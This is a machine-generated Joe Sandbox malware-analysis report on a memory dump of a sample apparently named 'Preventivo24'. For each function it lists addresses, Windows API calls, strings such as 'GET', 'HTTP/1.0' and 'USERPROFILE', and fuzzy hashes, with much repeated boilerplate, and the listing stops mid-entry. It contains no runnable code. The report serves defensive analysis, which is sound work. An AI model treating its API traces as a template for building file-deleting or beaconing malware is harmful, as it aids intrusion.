Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath
String ID:
API String ID: 953296794-0
Opcode ID: 6c60debbda7276a013a38c4191eb3544545fd9506d0adbf174f3a69b188f957e
Instruction ID: f49ff3729be68afcdd43c449bf5a0cb3cbce4271455c50d1ad352aec7fc383f6
Opcode Fuzzy Hash: 6c60debbda7276a013a38c4191eb3544545fd9506d0adbf174f3a69b188f957e
Instruction Fuzzy Hash: B761BD31A04609CFDB14DFA9C885BEDBBF0FF18324F144569E425A7291EB35A905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FFABE0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00FFAC40

Strings

GET, xrefs: 00FFADFC
HTTP/1.0, xrefs: 00FFBC34

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast
String ID: GET$HTTP/1.0
API String ID: 1452528299-2233155769
Opcode ID: 7bd15e12c2f887f2b7e162b380acb4c0aa636cbcc93759da2fa594fe96e652fd
Instruction ID: ef33e480a381f67a4a86cb24923ba46b6d785aaefcb190335b492834be883462
Opcode Fuzzy Hash: 7bd15e12c2f887f2b7e162b380acb4c0aa636cbcc93759da2fa594fe96e652fd
Instruction Fuzzy Hash: 334185B1D0161EDFDB11EFA4C845BAEF7B8FF44720F10452AE925A7390DB7899008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9D60 Relevance: 4.6, APIs: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,00000000,80004005,?,?,?,?,?,?), ref: 00FE9D85
CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,00000080,00000000,B5580983,00000000,00000000,80004005,?,?,?,?,?), ref: 00FE9DFD
CloseHandle.KERNEL32(?,?,011427D0), ref: 00FE9E66

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateDeleteHandle
String ID:
API String ID: 3273607511-0
Opcode ID: d0468d07559774cb1f53697c7a9b45069d64363fbc13c41105904efeab18bf04
Instruction ID: 939330a79c2fb6353577f457eb85b7ab8933bd17de4e96351abc92cff77277f4
Opcode Fuzzy Hash: d0468d07559774cb1f53697c7a9b45069d64363fbc13c41105904efeab18bf04
Instruction Fuzzy Hash: C1310471904658DFCB24CF55DD45BEEB7B4FB04710F108669EA66BB280D7B02941DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC56A5 Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__Getctype.LIBCPMT ref: 00EC5705
std::_Facet_Register.LIBCPMT ref: 00EC5767
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC579B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: std::_$Facet_GetctypeLockitLockit::~_Register
String ID:
API String ID: 1274453042-0
Opcode ID: 1ed43af64c29c15024bb6523f04519a3f312204ec211f8492e0a86040319d821
Instruction ID: f89aeba3f06404655c381cf00d11ae9c701e5ad5d557d2d2deda7214bdf63a1e
Opcode Fuzzy Hash: 1ed43af64c29c15024bb6523f04519a3f312204ec211f8492e0a86040319d821
Instruction Fuzzy Hash: 6B31B3B1C0564ACFDB05DF68CA4079DFBB0FF24304F108299D8446B251E775AA95CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1D50 Relevance: 4.5, APIs: 3, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FE1D59
DestroyWindow.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,010FB9A0), ref: 00FE1D68
IsWindow.USER32(?), ref: 00FE1D93

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$CurrentDestroyThread
String ID:
API String ID: 2303547079-0
Opcode ID: 89ee8f1adcde44efb53ce347bdba7ea33fc007722b06bc8dc855f054d91f7821
Instruction ID: 4b1cd523910b36e2ee5da0d854c27895d143bea7b181b1647f41057f6f3a29c3
Opcode Fuzzy Hash: 89ee8f1adcde44efb53ce347bdba7ea33fc007722b06bc8dc855f054d91f7821
Instruction Fuzzy Hash: 24F0A070407B50AFD3749F26EA48B56BBE5BF05B10F04095CE08A86994C7B0F880CB58

Uniqueness

Uniqueness Score: -1.00%

Function 01095E30 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,01095E2A,?,0108F842,?,?,B5580983,0108F842,?), ref: 01095E41
TerminateProcess.KERNEL32(00000000,?,01095E2A,?,0108F842,?,?,B5580983,0108F842,?), ref: 01095E48
ExitProcess.KERNEL32 ref: 01095E5A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 751caac9ba8e1f62715a848eff97fc570f7ce9200ef3c720e2cb406731890007
Instruction ID: 3b86fcf716cd9345e76cff0055b1e519868543f7768eda34c5f6072c29df332e
Opcode Fuzzy Hash: 751caac9ba8e1f62715a848eff97fc570f7ce9200ef3c720e2cb406731890007
Instruction Fuzzy Hash: A9D05E31000208AFCF2A3F66DE0C8CA7F2AAF103407008021F9544A265CB328882EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE190 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,B5580983,00000000,00000010,00000010), ref: 00FBE352

Part of subcall function 00FBE430: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,00000010,00000000,80004005), ref: 00FBE43D

Strings

USERPROFILE, xrefs: 00FBE1EA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: EnvironmentFolderHeapPathProcessSpecialVariable
String ID: USERPROFILE
API String ID: 2976596683-2419442777
Opcode ID: 3177cc8b11841eba96e28747d894f9090cf29d203b0d5fc0803753a0459ffee8
Instruction ID: c95c3f4e111da15b9689907bbf247db530433becdcf00ed5b0ee101051f8bd46
Opcode Fuzzy Hash: 3177cc8b11841eba96e28747d894f9090cf29d203b0d5fc0803753a0459ffee8
Instruction Fuzzy Hash: 6671B171A006199FDB14EF69C855BEEB7E9FF84320F144269E829A7381DB34AD01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE6290 Relevance: 3.2, APIs: 2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ce467dd12421d78cfdf9a1af7265351d3292d9975d81248e88bcb1299ee424
Instruction ID: 44209988fc8bfcf47dbd4c8e63865b2d8dea456a135c888347d4079fb326eeca
Opcode Fuzzy Hash: 05ce467dd12421d78cfdf9a1af7265351d3292d9975d81248e88bcb1299ee424
Instruction Fuzzy Hash: 8B61CF30A00289CBCB24DF69C8987ADB7B1FF19364F184529E825E7391DB34A885DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0100B090 Relevance: 3.2, APIs: 2, Instructions: 158COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0100B0E2
EndDialog.USER32(00000000,00000001), ref: 0100B0F1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DialogWindow
String ID:
API String ID: 2634769047-0
Opcode ID: 38fb920a01078e01737746e0b75c25ad6265ad5a1eb3e0b74d6b49d1a04baa20
Instruction ID: 7482d872ccf361324fbca863778323d6ceeeef31936149c0a52edb605e4a633d
Opcode Fuzzy Hash: 38fb920a01078e01737746e0b75c25ad6265ad5a1eb3e0b74d6b49d1a04baa20
Instruction Fuzzy Hash: D761BC34A01644DFDB09CF68C94876CBBF5BF09320F1482A9E865AB3D1CB359E05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1B50 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00FE14A6), ref: 00FE1B50
DestroyWindow.USER32(00000000,00000000), ref: 00FE1C0B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DestroyErrorLastWindow
String ID:
API String ID: 1182162058-0
Opcode ID: 5bac7a26283bb7dfd7a5fbb8002c9596bb7cc2e60803cfa522a8c4e7d1fe3e0a
Instruction ID: 9c99f856a4190f2060a08924232a716c403f98deb818c1f9f0def416e3e68d78
Opcode Fuzzy Hash: 5bac7a26283bb7dfd7a5fbb8002c9596bb7cc2e60803cfa522a8c4e7d1fe3e0a
Instruction Fuzzy Hash: 62212775A001099BDB20AE0AE8027EA77A8FB54330F104266FD14C7381D7B5E861E7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00FC16F0 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC0CA0: LoadLibraryW.KERNEL32(ComCtl32.dll,B5580983,?,00000000,00000000), ref: 00FC0CDA
Part of subcall function 00FC0CA0: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00FC0D00
Part of subcall function 00FC0CA0: FreeLibrary.KERNEL32(00000000), ref: 00FC0D89

SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FC1732
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FC1741

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: LibraryMessageSend$AddressFreeLoadProc
String ID:
API String ID: 3032493519-0
Opcode ID: 6c38dad0bff7b0e12aefa9944054f2b6652dc71eb184ec60f15dfd1d0e731544
Instruction ID: 76c96938d393d96df9fd272f202453b35246ce581fcca6554dd6ca1890308333
Opcode Fuzzy Hash: 6c38dad0bff7b0e12aefa9944054f2b6652dc71eb184ec60f15dfd1d0e731544
Instruction Fuzzy Hash: 27F0B4327512107BE720161A5C47F7BB29DDBC4B20F108229F6549B2C1DDE16C0143D9

Uniqueness

Uniqueness Score: -1.00%

Function 010A2866 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,010A4864,00000000,010A060A,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A287C
GetLastError.KERNEL32(?,?,010A4864,00000000,010A060A,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A2887

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 088a975aab3c2bae460d67e19d9dcd7d5a54d5d4f11173c137f3430e5540221c
Instruction ID: 2f527042b436e960fc6741f19b31065d397135d71f2e0bec8b77dd37b94dc37a
Opcode Fuzzy Hash: 088a975aab3c2bae460d67e19d9dcd7d5a54d5d4f11173c137f3430e5540221c
Instruction Fuzzy Hash: A7E0CD31101305ABCB353FF4E90C79DBF9A9B01351F1500B1F65C97150D63484C0C790

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4450 Relevance: 2.6, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 4b46a6d99797bdc0162021eff7d6b437fd4c4ae36b92caea5d1255b9905424d9
Instruction ID: 550b197912fef9095e283313b32b06921f76e1c7a041ffce91a0492936aa6889
Opcode Fuzzy Hash: 4b46a6d99797bdc0162021eff7d6b437fd4c4ae36b92caea5d1255b9905424d9
Instruction Fuzzy Hash: 8201F935301211AFE614DA59DC89F2EF796EFD5331F20412EFA18EB2D0CB616C019794

Uniqueness

Uniqueness Score: -1.00%

Function 0106EEA0 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be32b52a0a4a1b66d24cc168a37fd1bcaad94cfe2b1098ca44cbc6b1c2c31fb
Instruction ID: 4715f1406f8aee52e23052784e26d06e3f6e5d1c00cdcc5cbcb6ea62af94a55e
Opcode Fuzzy Hash: 5be32b52a0a4a1b66d24cc168a37fd1bcaad94cfe2b1098ca44cbc6b1c2c31fb
Instruction Fuzzy Hash: 4EA165B1A05609DFDB04DF68D95479EBBF4FF08314F1081AEE859AB380D775AA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FFE7C0 Relevance: 1.7, APIs: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,B5580983,B5580983,?,?,0115D178), ref: 00FFE804

Memory Dump Source

